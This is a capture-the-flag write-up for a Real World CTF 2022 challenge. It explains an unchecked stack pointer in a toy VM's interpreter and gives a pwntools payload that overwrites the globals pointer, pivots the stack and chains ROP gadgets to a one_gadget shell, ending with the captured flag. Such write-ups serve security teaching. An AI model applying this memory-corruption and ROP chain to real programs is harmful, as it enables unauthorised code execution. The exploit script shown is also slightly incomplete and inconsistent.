Secured Java - Real World CTF 2022
Professor Terence Parr has taught us how to build a virtual machine. Now it’s time to break it! nc 47.243.140.252 1337
Analysis
Checksec
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
File command output
ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter ld-2.31.so, for GNU/Linux 3.2.0, BuildID[sha1]=ac06c33f16248df7768fed3ecefb7e6a85ec5941, not stripped
So we have a 64 bits binary with all mitigations enabled that is also dynamically linked.
Finding the vulnerability
void vm_exec(VM *vm, int startip, bool trace)
{
// registers
int ip; // instruction pointer register
int sp; // stack pointer register
int callsp; // call stack pointer register
int a = 0;
int b = 0;
int addr = 0;
int offset = 0;
ip = startip;
sp = -1;
callsp = -1;
int opcode = vm->code[ip];
while (opcode != HALT && ip < vm->code_size) {
if (trace) vm_print_instr(vm->code, ip);
ip++; //jump to next instruction or to operand
switch (opcode) {
case IADD:
b = vm->stack[sp--]; // 2nd opnd at top of stack
a = vm->stack[sp--]; // 1st opnd 1 below top
vm->stack[++sp] = a + b; // push result
break;
case ISUB:
b = vm->stack[sp--];
a = vm->stack[sp--];
vm->stack[++sp] = a - b;
break;
case IMUL:
b = vm->stack[sp--];
a = vm->stack[sp--];
vm->stack[++sp] = a * b;
break;
case ILT:
b = vm->stack[sp--];
a = vm->stack[sp--];
vm->stack[++sp] = (a < b) ? true : false;
break;
case IEQ:
b = vm->stack[sp--];
a = vm->stack[sp--];
vm->stack[++sp] = (a == b) ? true : false;
break;
case BR:
ip = vm->code[ip];
break;
case BRT:
addr = vm->code[ip++];
if (vm->stack[sp--] == true) ip = addr;
break;
case BRF:
addr = vm->code[ip++];
if (vm->stack[sp--] == false) ip = addr;
break;
case ICONST:
vm->stack[++sp] = vm->code[ip++]; // push operand
break;
case LOAD: // load local or arg
offset = vm->code[ip++];
vm->stack[++sp] = vm->call_stack[callsp].locals[offset];
break;
case GLOAD: // load from global memory
addr = vm->code[ip++];
vm->stack[++sp] = vm->globals[addr];
break;
case STORE:
offset = vm->code[ip++];
vm->call_stack[callsp].locals[offset] = vm->stack[sp--];
break;
case GSTORE:
addr = vm->code[ip++];
vm->globals[addr] = vm->stack[sp--];
break;
case PRINT:
printf("%d\n", vm->stack[sp--]);
break;
case POP:
--sp;
break;
case CALL:
// expects all args on stack
addr = vm->code[ip++];// index of target function
int nargs = vm->code[ip++];// how many args got pushed
int nlocals = vm->code[ip++];// how many locals to allocate
++callsp; // bump stack pointer to reveal space for this call
vm_context_init(&vm->call_stack[callsp], ip, nargs+nlocals);
// copy args into new context
for (int i=0; i<nargs; i++) {
vm->call_stack[callsp].locals[i] = vm->stack[sp-i];
}
sp -= nargs;
ip = addr;// jump to function
break;
case RET:
ip = vm->call_stack[callsp].returnip;
callsp--; // pop context
break;
default:
printf("invalid opcode: %d at ip=%d\n", opcode, (ip - 1));
exit(1);
}
if (trace) vm_print_stack(vm->stack, sp);
opcode = vm->code[ip];
}
if (trace) vm_print_data(vm->globals, vm->nglobals);
}
As we can see, no checks are made to the stack pointer variable. Meaning it can have negative values and write outside the stack buffer. But how does this help us at all?
typedef struct {
int *code;
int code_size;
// global variable space
int *globals;
int nglobals;
// Operand stack, grows upwards
int stack[DEFAULT_STACK_SIZE];
Context call_stack[DEFAULT_CALL_STACK_SIZE];
} VM;
0x0000563c30e812a0│+0x02a0: 0x00007ffd6af2c040 → 0x0000000c0000000f #code pointer
0x0000563c30e812a8│+0x02a8: 0x0000000000000080 # number of instructions (0x80 = 128)
0x0000563c30e812b0│+0x02b0: 0x0000563c30e833a0 → 0x0000000000000000 #globals pointer
0x0000563c30e812b8│+0x02b8: 0x0000000000000000 #stack
0x0000563c30e812c0│+0x02c0: 0x0000000000000000
0x0000563c30e812c8│+0x02c8: 0x0000000000000000
We know by analysing the vm.c that it allocates the vm on the heap as continous memory (since calloc is used for the allocation). By analysing the heap in the beginning of the program (as shown above), we can conclude that if the stack pointer takes the value of -1 it will be overwriting the globals pointer, giving us arbitrary write permissions. So if we set the globals pointer to, for instances, the return address of main, we can change code execution to wherever we want and we won’t have to worry about the cannary.
Exploit
Initial notes
Given that the vm only receives input once, we will be using the vm’s add function to calculate the offsets that I need in order to beat PIE. We have to assume that ASLR is also enabled on the server, since we have no information indicating the otherwise. Also, I recomend checking the specific assembly that the vm works (you can find it in the files vm.c and vm.h, which are in the simple-virtual-machine-C-master directory), not only because it will make this exploit clearer, but also, because I relied a lot on that assembly to open my shell.
void vm_init(VM *vm, int *code, int code_size, int nglobals)
{
vm->code = code;
vm->code_size = code_size;
vm->globals = calloc(nglobals, sizeof(int));
vm->nglobals = nglobals;
}
int main(int argc, char *argv[]) {
int code[128], nread = 0;
while (nread < sizeof(code)) {
int ret = read(0, code+nread, sizeof(code)-nread);
if (ret <= 0) break;
nread += ret;
}
VM *vm = vm_create(code, nread/4, 0);
vm_exec(vm, 0, true);
vm_free(vm);
return 0;
}
I’d also like to point out that the code pointer is , not only, a pointer to a stack stored buffer (as you can see above), but also, stored (in the heap) at a fixed offset from the vm’s stack . Therefore, we can find the return address of main by setting the globals pointer to the same address as the code pointer, since it will always be stored on the stack at a fixed offset.
Gadgets use
For this exploit I will rely on three gadgets:
[1] pop rsp ; ret (will be used to pivot the stack)
[2] xor r12d, r12d ; mov rax, r12 ; pop r12 ; ret (to meet one gadget constrains)
[3] one gadget (one of the possible offsets)
The usage of theese gadgets will be explained later.
Assembly instructions used (vm’s assembly)
I will only use the following assembly instructions:
[1] ICONST value (= push value)
[2] POP (=simply decrements the stack pointer)
[3] GLOAD offset (loads globals[offset] to the stack,increments the stack pointer)
[4] GSTORE offset (stores to globals[offset] the value on top of the stack,decrements the stack pointer)
[5] LOAD offset (loads callstack[offset] to the stack,increments the stack pointer)
[6] STORE offset (stores to callstack[offset] the value on top of the stack,decrements the stack pointer)
[7] ADD (adds the first two values on the stack and places the result on top of the stack)\
Actual exploit
#just to interact with the binary
def vm_halt():
return p32(18)
def vm_push(value):
return p32(9) + p32(value)
def vm_pop(times=1):
return p32(15)*times
def vm_gload(offset):
return p32(11) + p32(offset)
#value is on the stack
def vm_gstore(offset):
return p32(13) + p32(offset)
def vm_load(offset):
return p32(10) + p32(offset)
def vm_store(offset):
return p32(12) + p32(offset)
def vm_add():
return p32(1)
IP_MOST_SIGNIFICANT = 0
IP_LEAST_SIGNIFICANT = 1
RET_MAIN_LEAST = 134
ONE_GADGET_OFFSET=0xbfbcb
FIRST_GADGET_OFFSET=0xbaa7
GLOBALS_LEAST=5
SECOND_GADGET_OFFSET=0xac13d
RET_MAIN_LEAST_STORED=9
RET_MAIN_MOST_STORED=10
I have defined some functions to help me send the correct instructions to the vm. Also, I defined some constants to help me with the offset handling. It is worth mentioning, the the code buffer is a integer buffer and integers are 4 bytes (32 bits) long, hence I use the p32 function from pwntools. We will start by moving the stack pointer to the code pointer, while storing the globals pointer to be reset later. After storing the code pointer in the callstack, we set the globals to point to the same place as code. This first part of the exploit is shown bellow.
#stores the globals locally pointer to later reset it to its original value
# stores ip address value locally
payload += vm_pop() + vm_store(GLOBALS_MOST) + vm_store(GLOBALS_LEAST) + vm_pop(2) + vm_store(IP_MOST_SIGNIFICANT) + vm_store(IP_LEAST_SIGNIFICANT)
# overwrites ip with the same address to keep it
payload += vm_load(IP_LEAST_SIGNIFICANT) + vm_load(IP_MOST_SIGNIFICANT) + vm_push(0x80) + vm_push(0)
# overwrites the globals pointer to be the same as the ip address
payload += vm_load(IP_LEAST_SIGNIFICANT) + vm_load(IP_MOST_SIGNIFICANT)
#stores main return value
payload += vm_gload(RET_MAIN_LEAST) + vm_store(RET_MAIN_LEAST_STORED) +vm_gload(RET_MAIN_LEAST+1) + vm_store(RET_MAIN_MOST_STORED)
I stored the main’s return address locally just for convinence in the address calculation that will be done later. Now, we will overwrite the least significant part of the main’s return address with the gadget 1, to pivot the stack. To achieve this, we only need to call the vm’s add function with both the least significant part of the main’s return address and the gadget’s offset (from the main’s return address) placed on the stack. The overwrite is just a simple combination of loads and stores (both global and from the callstack). I decided to pivot the stack to where code points, as it needed to be 16-bit aligned and code is. So, using a combination of loads and stores I wrote the address pointed by code next to the gadget’s address (so pop rsp will pop this value).
#changes main return address to pop rsp gadget (to get an aligned stack)
payload += vm_gload(RET_MAIN_LEAST) + vm_push(FIRST_GADGET_OFFSET) + vm_add() + vm_gstore(RET_MAIN_LEAST)
#pivots the stack
payload += vm_load(IP_LEAST_SIGNIFICANT) + vm_gstore(RET_MAIN_LEAST+2) + vm_load(IP_MOST_SIGNIFICANT) + vm_gstore(RET_MAIN_LEAST+3)
Now, I suggest that we take a look at the one gadget constrains (I chose this one, however another could have been chosen instead).
0xe6c7e execve("/bin/sh", r15, r12)
constraints:
[r15] == NULL || r15 == NULL
[r12] == NULL || r12 == NULL
Using gdb I found out that r15 is always NULL, but r12 isn’t. So I used the second gadget to make sure that r12 is NULL.
#writes the address of the other gadget
payload += vm_load(RET_MAIN_MOST_STORED) + vm_gstore(1) + vm_load(RET_MAIN_LEAST_STORED) + vm_push(SECOND_GADGET_OFFSET)
payload += vm_add() + vm_gstore(0)
Using the same logic that I used to get the address for the first gadget, I calculated the address of the second gadget and set the stack to ensure that r12 ends up NULL in the end. Finnaly, all that is left to do is write the address of one gadget to garantee that the ret from the second gadget returns to one gadget (to calculate the address I used, one last time, the same logic as for the other two gadgets). Then, when we call halt (forcing main to return), we will have opened a shell.
# writes the address of one_gadget
payload += vm_load(RET_MAIN_MOST_STORED) + vm_gstore(5) + vm_load(RET_MAIN_LEAST_STORED) + vm_push(ONE_GADGET_OFFSET) + vm_add() + vm_gstore(4)
#restores the globals pointer to ensure there are no problems in free
payload += vm_push(0) + vm_gstore(2) + vm_push(0) + vm_gstore(3)
payload += vm_push(0)*2 + vm_pop(3) + vm_load(GLOBALS_MOST) + vm_pop(2) + vm_load(GLOBALS_LEAST)
#garantees the payload size (in bytes) is 512
payload += (512-len(payload)//4)*vm_halt()
I restored the globals pointer just to make sure the free call doesn’t fail. Also, the binary reads a payload of 512 bytes (=128*4byte), so the last line of my exploit ensures that the payload’s lenght is 512 (adding as many halts as needed).
And finnaly we got out shell!!
[+] Opening connection to 47.243.140.252 on port 1337: Done
[*] Switching to interactive mode
rwctf{simple_vm_escape_helps_warming_up_your_real_world_hacking_skill}
Final Notes
Overall, this was a fun challenged, as it ,not only, forced me to think in a different assembly language, but also, is an uncommon one. I’d like to point out that this is just one approach, we could have chosen a different approach. For instances, instead of the main’s return address we could have overwritten the free hook.